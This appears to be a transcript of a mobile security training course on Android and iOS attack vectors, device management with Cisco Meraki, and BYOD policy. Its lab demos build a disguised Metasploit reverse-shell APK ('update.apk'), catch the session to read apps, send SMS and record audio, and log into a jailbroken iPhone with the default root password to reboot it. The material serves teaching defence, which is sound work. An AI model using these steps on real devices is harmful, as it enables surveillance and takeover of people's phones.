Mobile devices are becoming commonplace in the enterprise, with BYOD policies abundant and users bringing their own personal devices to attach to corporate networks. Here we'll talk about mobile attack vectors in both Android and iOS, and the importance of mobile device management systems and the guidelines we can use to secure our assets. We're all aware of the prevalence of mobile devices in our modern world. Most all of us are walking around with some sort of mobile device in our pocket. And this is also a consideration in an enterprise environment as well. We have increasingly seen the use of our personal devices on business networks, with things like BYOD policies being very common now. It's almost a foregone conclusion these days that users will attach their own devices to corporate Wi-Fi networks, as we see the desire for constant connectivity. We also commonly perform business transactions on our mobile devices. That would include our own personal business, maybe our personal banking, or our corporate businesses, and corporate email. If an attacker can compromise a mobile device, not only can they gain access to the data on the device itself, but they may also be able to pivot throughout the rest of the corporate network. Mobile devices can provide a path into a target network if they're not properly secured. So let's look at some possible vectors for this and considerations that we need to be aware of. The first general vector we can identify is the network that the device is using. For our purposes, we think of this in terms of the wireless network to which a mobile device is attached when they're inside of our organization. Now, an obvious attack vector here would be weak wireless standards. Maybe we're using older Wi-Fi standards instead of something like WPA2, or maybe we're even using no encryption at all. This opens up the user to eavesdropping on their wireless data transmission. This can also involve rogue access points, such as the evil twin attack that we've looked at previously. After gaining access to a mobile device through a rogue wireless access point, then the attacker might set up persistent access to the device, so that once the user joins the legitimate internal network, then they have access to those assets. Other threats involved in the network vector would include packet sniffing, with a tool like Wireshark, for example. This can capture sensitive data such as login credentials that the user may be passing in plain text between their device and other applications. Session hijacking is also possible with these types of sniffing attacks. This is where the attacker would have the ability to steal session ID information in order to gain their own unauthorized access to the network in some way. The device itself is another general vector of attack, and this can take various forms. Many of these tactics would include social engineering-based attacks, such as phishing emails, or maybe that happens through SMS messages. These would be in a similar manner as any other phishing attack, where a user would be tricked into interacting with a malicious website or a code in order for the attacker to do something like steal their login credentials. This is especially more likely to be successful for a couple of reasons. Number one, we have a smaller screen visible usually that may cause us to miss the important hallmarks of a malicious website in a mobile browser. Also, we may be expecting a mobile version of a website that looks different from the desktop version that we're familiar with, and that can lower our defenses. When we're talking about phishing in terms of SMS messaging, we refer to this as smishing or SMS phishing. I actually get these at an alarmingly increasing rate, where SMS messages with links embedded are sent trying to lure me into visiting a malicious website, or maybe just to call a phone number from someone purporting to be from a legitimate organization. And the goal here is to try to obtain my financial information, or maybe my personal data such as a social security number. Another general vector category is the operating system. Some of the basic considerations here will be to make sure that we're using secure passcodes, pins, or pattern locks in order to secure access to the operating system. Physical loss of a device can create a situation where a malicious user has untethered access to a mobile device, and that's a worst case scenario. We also want to make sure that users on the corporate network aren't utilizing devices with unauthorized operating system versions. In other words, they should be running the latest mobile operating system that's available for their device, and they should not be using phones that have security mechanisms removed. In iOS, this would be a jailbroken phone, and in Android, this would be a rooted phone. Both of these are tactics used to bypass restrictions on mobile devices, which are put in place to prevent malicious code or unauthorized applications from being installed. This can be a way that malware is introduced to a device, either unintentionally by a user installing a compromised application outside of their given device's app store, or through allowing an attacker to install a malicious application onto the device in order to manipulate or control the system and the data inside. Something that we'll talk about more later on is a mobile device management system. We can use these to make sure that devices which have these restrictions bypassed, either jailbroken or rooted phones, would not be allowed onto our enterprise network. Let's take a closer look here at hacking Android OS. We've already mentioned that one of the biggest dangers on our network are devices that have been jailbroken or rooted. In the case of Android, that would be a rooted device. That's where a user has obtained root access in order to bypass certain security mechanisms that have been put in place for their protection. Now, in this case, I have a virtual machine running Android OS. This is a tablet OS. This is running Android 7 Nougat. And we're going to do some testing against this just to show you what's going on here. So let me open up my app drawer, and I've already gone and I've rooted this particular instance. If we look at this application called Kingo Root, let's open that up, and you'll see that root is succeeded on that. So this device is already rooted. So we're going to look at some ways that we can exploit this. Let's assume that we have a user on the corporate network and they're running a rooted Android device, which is common to do. Lots of users prefer Android for the ability to easily root that and to manipulate the operating system. So in order to do this, let's first look here in Parrot OS. And the first thing I want to do from my terminal, I'm going to say service Apache 2 status. And you can see that at the moment, my Apache 2 status is inactive. So I'm going to start this Apache 2 service. I'm going to say service Apache 2 start. And we'll give that just a moment to start. If we look at the status again, now you can see that the service is indeed up and running. So basically what I've done here is I've started an Apache HTTP server. And a common tactic that an attacker might use is they may have some malware placed on their own personal server that they would fool the user on the other end into clicking on. So they would use some sort of social engineering technique. Maybe they would email a link to this file to a user. They might send that through an SMS message in hopes that the user would click and install this malicious application in some way that they've created. So let me break out of this particular output here in my terminal, and let's look at an example of how we can do this. Now, there are many tools out there for hacking Android operating system. I'm going to show you a simple option that's actually built into Metasploit here. And to start with, we're going to use something called Metasploit Venom. So we'll say MSF Venom. We'll say -P to set the payload. And the payload I want to use is Android Meterpreter reverse TCP. So this is essentially going to start a reverse TCP connection. It's going to give me Meterpreter shell access into an Android operating system that has clicked on my malicious APK, my malicious application that I'm creating. So the first thing we're going to do here is we're actually going to create a .apk file, which is the file extension that Android uses for applications, and we're going to deliver that to the Android user in some way. So I have my payload set. I want to say lhost, that's the local host. If I look in a different tab here, you can see that my IP address for my local host is 10.0.2.9. So that's what I want to say. I want to say localhost equals 10.0.2.9. So this particular attack is going to happen from the local network. Now you could also do that with a public IP address if you were not inside the network, but in my case, in my lab, I am on the same network. I want to say lport, the listening port, is 5555 is what I'm going to use. and I'm going to create a file name here, and I'm going to call that update.apk. That's an enticing name that hopefully would entice the user into installing this. Maybe we could fool them some way into thinking this is an Android OS update. Let's hit enter, and you'll see that this will eventually create our file. You see that that is completed. If we do an ls command, you can see this file listed in here. We have update.apk. So now what I'm going to do is I'm actually going to move this file. And if we go into our system, let's just take a look at our file system here. And the folder I'm going to go into is var www HTML. So this is where anything we want to host on our local Apache server would be placed if we want to serve that out to someone. So I'm going to move that to this particular directory. So I'm going to say mv for move, update.apk. I want to move that to var www HTML. I'll hit enter, and now that is moved. If we look back in our HTML directory, we do see our update.apk listed here. Now let me go back to my Android VirtualBox here, and let's say that somehow we fooled a user into visiting our web server that we've just got up and running. And that web server address, if we want them to install this malicious update file, so if I actually go out to this IP address 10.0.2.9, that's the IP address for my Parrot OS machine, you can see that I am able to access this Apache server. So my web service is up and running. Now, if I pointed this particular user specifically to the file update.apk and we hit enter, you can see that a download dialog box pops up. Let's say OK. It downloaded it. Let's open it. And you can see all of the permissions that this allows. A lot of permissions. We can modify system settings. We can take pictures and videos. We can record audio, read text messages. All of this is the permission that we're giving this application. So again, we're using social engineering. We're hoping we can fool a user in some way into installing this themselves. We'll say install. That will take just a moment to install. It installed. Then it takes us back to our main security page. It looks like our install is all complete. So let's give this a try. Let's jump back over here into my Parrot OS. And now let's go into Metasploit. Let's say MSF console to get that up and going. We're going to say use multi-handler. We're going to set the payload to the same payload we sent over. Android/interpreter/reverse_TCP. We're going to set the local host 10.0.2.9, our own local address. We're going to set our local port to the same port, 5555. And we're going to say exploit. You can see that this started a reverse TCP handler. Now, ideally, I did do this out of order. We would want to run this particular command first before we sent that over to our client that we're trying to gain access to. But in my case, it did work because that happened pretty close to the same time. Ideally, you would want to open this listening session, have it listening, and then try to deliver that to the Android operating system. In our case, you can see it did open a session. It opened a session from our machine at 10.0.2.9 over to 10.0.2.10, which is my Android operating system that I have running inside of VirtualBox. So from here, if I say help, you're going to be able to see a long list of things that we're able to do. And in fact, I could say things like app_list. This is going to show a list of applications installed. We can say check root, which confirms that this device is in fact rooted. We can even say things like send_SMS. We can send messages from this device. We can say record_mic, and that's going to create a recording from the microphone for a certain amount of time that we can specify. You can see that it saves it to a root folder. All kinds of different things we can do. So we have gained a tremendous amount of access here just because, number one, this device was rooted. And number two, we were able to successfully deliver a malicious APK to the end user. So again, just a quick example of how we could hack Android OS. There are many other tools out there in addition to things like Metasploit that will do this, but I wanted to show you just some of the risk involved with allowing rooted devices onto a corporate network. Obviously, once we're inside of this device, we could potentially begin to pivot throughout any sort of wireless network that they're connected to inside. We may be able to reach out to other wireless clients and also infect them. All kinds of things are available to us. Later in this same course section, we'll discuss something called mobile device management. That's a tool that we can use to make sure we're blocking any access to clients that may be jailbroken or rooted from our corporate networks, and that's certainly a best practice. In addition to the dangers of allowing those rooted Android devices on the network, I also want to talk about allowing jailbroken iOS devices. Those are also a big danger. So in my case, you can see on the right-hand side of my screen here, I actually have a screen capture from my actual iOS device that I'm running. This is an older iPhone that I have in my lab. And with iOS devices, unfortunately, there's no way to emulate those. Apple doesn't allow for that iOS to be installed on anything outside of an authorized Apple device. So if you are going to perform any sort of testing on this, you will need an actual physical device with iOS running. Now, in my case, I do have one of those, and that's the screen that we're seeing here. So if I actually swipe up on this phone that I have, you can see that it is displayed on the screen. So this is a physical device. You'll also notice that in the bottom left-hand corner of that, I have an application called Cydia. So let me touch that and get that loaded up. This is a common way that iOS devices are jailbroken. And again, there may be legitimate user reasons for them wanting to do this, but for us in general, it's a very bad idea to allow these types of devices onto our network. And I'm going to show you why. So this device is in fact already jailbroken. It has Cydia installed. Let me go back to the main screen here. And one thing that happens, depending on the jailbreak method, one thing that's going to be opened by default will be your SSH port. That means that someone potentially has the availability to SSH into a jailbroken iOS device. And that's exactly what I'm going to do here. So here on the left-hand side, I'm just in my normal MacBook terminal here. And the first thing I want to do is I want to ping this device just to verify the IP address and that I have connectivity at 10.32.1.71. That's the IP address that I'm running internally here in the lab, and you can in fact see that that is successful. So I have wireless access to this iPhone. Now, as I said, these jailbreaking methods, by default, many of those will open up your SSH port, and there is a default SSH account in place on an iPhone. Those credentials are very well documented. It's a root user, and the password is Alpine in all lowercase. So I'm actually going to try and connect to this iPhone through SSH access. I can do that in my regular MacBook terminal by saying SSH. I want to try to connect as the root user at 10.32.1.71. I'll hit enter. Again, that password is Alpine in all lowercase. And when I do, it's as easy as that. I have root access to this device. I can perform an ls command, so I can begin to look through files. I can see the available commands on here. If I say something like ls/user/bin, you can see all of those available. If I hit tab twice, it asks me, do I want to display all 497 possibilities for my commands? If I say yes, you can see a huge range of commands that we have the ability to perform on this device. We can say things like df. That's going to show all of the different hard drive partitions that we have. We could get really catastrophic if I said something like rm-rf. Now, I'm not going to enter this command. This particular command would force the recursive removal of all of the hard drive directories and their contents, so I'm going to delete that out before I accidentally hit enter. We could get really crazy and say kill 1 and hit enter. The connection to my iPhone was closed. Now, it didn't reflect that in my screen recording here, but what actually happened was this iPhone is actually currently rebooting because I killed the entire process. And as I said that, you can see that my movie window actually did close here because I lost connectivity to that. This completely rebooted the iPhone. So again, these are some of the dangers in allowing these devices on a network. I've obtained wireless access to this, and you can see that the iPhone just came back up. So I'm back at my passcode login screen. I can put that in, and then I am able to log back into that. These are some of the dangers in allowing a jailbroken device on the network. I wirelessly was able to obtain root access to this device. That would have allowed me to maybe send files over there, install malware, begin to pivot through the corporate network, and affect other users. So in our next video, we'll take a look at mobile device management and how we can use some of these mobile device management solutions to block these types of unauthorized devices from our network. Devices that are not running up-to-date software and devices that have had security mechanisms bypassed, like jailbroken iPhones and rooted Android devices. Another important consideration we want to examine is mobile device management. We've looked at some of the risks with unauthorized mobile devices being on our network, such as rooted Android phones or jailbroken iOS devices. Unmanaged mobile devices in any way can be a huge security risk because it's very common for users these days to access highly sensitive enterprise data on a mobile device. As with any device we allow to connect to our networks, we need to be able to ensure that mobile devices are up to date and patched properly. And also, if a device gets stolen, we need to have ways to remotely wipe these devices. We're going to look at Cisco's Meraki solution for this as an example of a way that we can manage our devices from a unified central location to enforce security policies and to remotely wipe devices in case that is needed. As with many other management tools, there are lots of options out there, but this Cisco solution is the one that I'm most familiar with, so we'll look at this just as an example of how an MDM works. This solution will certainly let us see some of the important reasons that we would use a mobile device management system. Now, before we can manage our devices in this way, we need to enroll these devices with our MDM solution server. It's common for us to have BYOD deployments where we allow users to access our enterprise networks on their own personal mobile devices. And the reason this is becoming more and more common is it's a cost savings and it's a more seamless experience. If we do that, we do need to register these devices with our mobile device manager. For a look at how we do that in Meraki, we do that by going under the Systems Manager menu on the left, and under the Manage section, we can choose Add Devices. From here, we can see various ways to enroll our devices. Along the top, we can choose our operating system with iOS currently showing. Notice that we need a valid Apple push certificate in place on our Meraki device before we can register an iOS device, and these can be created for free of charge using an Apple ID. We then need to install the profile on each iOS device using the Systems Manager iOS app and scanning the QR code, or by visiting m.meraki.com. That's a mobile site that we can visit in the browser of the device itself, and we can enter a provided network ID. We also have the ability to automatically discover enrollment on our network, which is a less cumbersome solution. If we go back to the Systems Manager menu on the left and we choose General under the Configure section, we can see some enrollment settings here, including the ability to enable user enrollment. You can also see the default tag in place, which is set to recently added by default, although this can obviously be changed. Below that, we have our access rights. This is how we determine what we have the ability to affect from the management dashboard. You can see that by default, we will be allowed to lock and erase devices, which is an important feature to be able to control in the event that a device gets lost or stolen. After device enrollment is completed, we can additionally create configuration profiles. These are going to contain settings that will get pushed out to the managed devices themselves. Maybe we want to push out Wi-Fi access, maybe VPN access, or maybe those are device restrictions or corporate email settings, and lots more. If we go to Systems Manager on the left and we choose Settings under Manage, we see our profile lists, which are currently empty. If we click Add Profile, we can choose the user profile that we want to affect, and then we would be able to give the profile a name. So let's say Test in this case. We can optionally give that a description. We can choose the scope of that as well. Let's say we wanted to do that against all of the following tags, and we'll use recently added. We can click Save, and then we can add settings near the top. From here, we have lots of different restrictions that we can put in place based on the operating system. If we look at the iOS device type, for example, at the top, this will even sort our settings for us based on the user's device. Something else we can do back under Systems Manager on the left, let's choose Geofencing under Configure. We can configure actions based on the physical location of a device if we want to do that. We can go to Systems Manager, Policy, and from here we can define security policy rules. For example, we might want to enforce passcode locks. That would ensure a device has to have a valid passcode in place to be allowed on the network. We can ensure that the device is not compromised, in other words. The device hasn't been rooted or jailbroken, and many other things. We can go to Systems Manager and click Alerts, and we can receive automated alerts in the event that a policy is violated. We can also use these policies and alerts to automatically remove applications and profiles based on the status of the device. So for example, if a user installs the Tor web browser, we can configure a policy to automatically remove wireless settings that would attach them to our network. If we had a policy in place disallowing the Tor browser, this is something that we might do. So lots of different options we have that we can possibly do here at our disposal. If we go to Systems Manager and choose Devices under the Monitor section, of course we don't have any mobile devices registered at the moment, but from here, with a registered device, we could click on the device to send a notification directly to the end user. We could also do things like powering the device off, we could obtain a GPS location, or we could lock and wipe the device as well. So if a device gets stolen or lost, these are some actions that we might want to take. So that's a quick look at the powerful features of a mobile device manager. Specifically here, we've looked at the Cisco Meraki solution. Again, there are lots of different solutions out there, depending on how you want to implement that with your own enterprise wireless network. But it is a great best practice to have in place. We have so many wireless devices being used now, personal devices that have been brought from home. It's definitely a good idea to have some sort of mobile device manager in place. So if you're performing an assessment for a client and they don't have one of those, but they are allowing mobile devices onto their network, that's definitely a recommendation you should consider making to them. We've explored some of the dangers associated with mobile devices on a corporate network, so let's talk about some important guidelines for the usage of those devices. This all begins with creating our own device policy, what we call a BYOD policy, bring your own device. This should be an authorized enterprise policy that is made available to the internal users, and that should outline acceptable usage of the network and the devices. There are many considerations for what this policy should contain, including things like the scope. In other words, what types of devices are allowed to be used on the enterprise network, such as personal phones, tablets, laptops, and other devices. We want to explicitly state what types of devices are allowed. We may also want to outline restrictions for the usage of these devices. For example, depending on the business sector that we're in, we might limit users to not using photo or video recording capabilities while on the enterprise network, or maybe the use of personal email or text messaging. These can be vectors for attackers to enter our enterprise network. Outlining the expected device compliancy standards may also be a consideration. This is especially true if we're using an MDM system, a mobile device management system, to enforce compliancy. We've looked at the upsides of an MDM previously, which allow us to do things such as ensuring that users are running up-to-date software. These expectations here should be laid out accordingly, and the users should understand that with an MDM, we have the right to prohibit their access to the network if they fail to meet these expectations. Along these lines, we should also lay out privacy expectations. We should let our users know that if they are using our enterprise network with a personal device, particularly if they're enrolled with our MDM, then we have the right to monitor certain metrics like network traffic, OS patching status, and more. We have the right to review their activity and analyze any patterns as we see fit in order to ensure that the enterprise resources and assets are not in danger. For lost or stolen devices, we need to set an expectation level here as well. Users should be required to have remote location or data wiping capabilities, either through their own Android or Apple iOS service or through our mobile device management system. This will protect things like any corporate email account that may be set up on the device, any enterprise wireless configuration settings, and more. We've already talked about MDM capabilities, but it's worth noting that these should also be explicitly outlined in a BYOD policy. Users should understand what will be enforced, such as appropriate device password locks, our previously mentioned remote wipe capabilities, and the fact that we will block access to any rooted or jailbroken device from the network. So our BYOD policy should thoroughly outline all of the expectations that we've covered here, and additionally, any consequences for violations of the policy. And those may range from things like the removal of their access to the enterprise network or even termination in extreme cases. We also want to outline what is expected in the case of any security concerns. For instance, if a device gets lost or stolen, or maybe it's suspected to be infected with malware, the users should know that they are expected to report such cases immediately to the appropriate administrator so that precautionary actions may be taken from the enterprise perspective. Other considerations we need to take into account are from the administrator perspective, including protecting the underlying infrastructure and network. This may include things like excluding personal devices from sensitive areas of the network. We may allow simple internet access through our wireless network, but maybe we still want to block access to our enterprise applications or data as an additional protection mechanism. We may also specifically block internet resources or applications for these devices. For example, we might block social media applications or social media mobile sites, which could open up users to phishing attacks, or maybe even block sites that take up valuable network bandwidth, such as video streaming services. And of course, more general security considerations apply here as well, such as having appropriate firewall rules in place, intrusion prevention systems, and antivirus and anti-malware solutions. And of course, we certainly can't leave out user awareness training as a best practice security guideline. Ideally, during the onboarding process for a new employee, our BYOD policy should be covered and the expectations should be set. This may also include ongoing training in regard to helping users identify suspicious emails, SMS phishing attempts, and potentially malicious websites. There are support considerations to be aware of as well. By allowing personal devices onto the network, we have essentially multiplied the amount of devices that we are expected to support by 2 or 3 times, so we should understand this. We need to understand that BYOD policies may bring a wider range of operating systems and devices into the enterprise, for which we should have the manpower to support and the knowledge to troubleshoot. We also should understand that our ongoing support efforts should be assisted by our MDM solution. This would include monitoring event logs and periodic testing of the MDM solution to make sure that things are working as expected and that we are as protected as possible.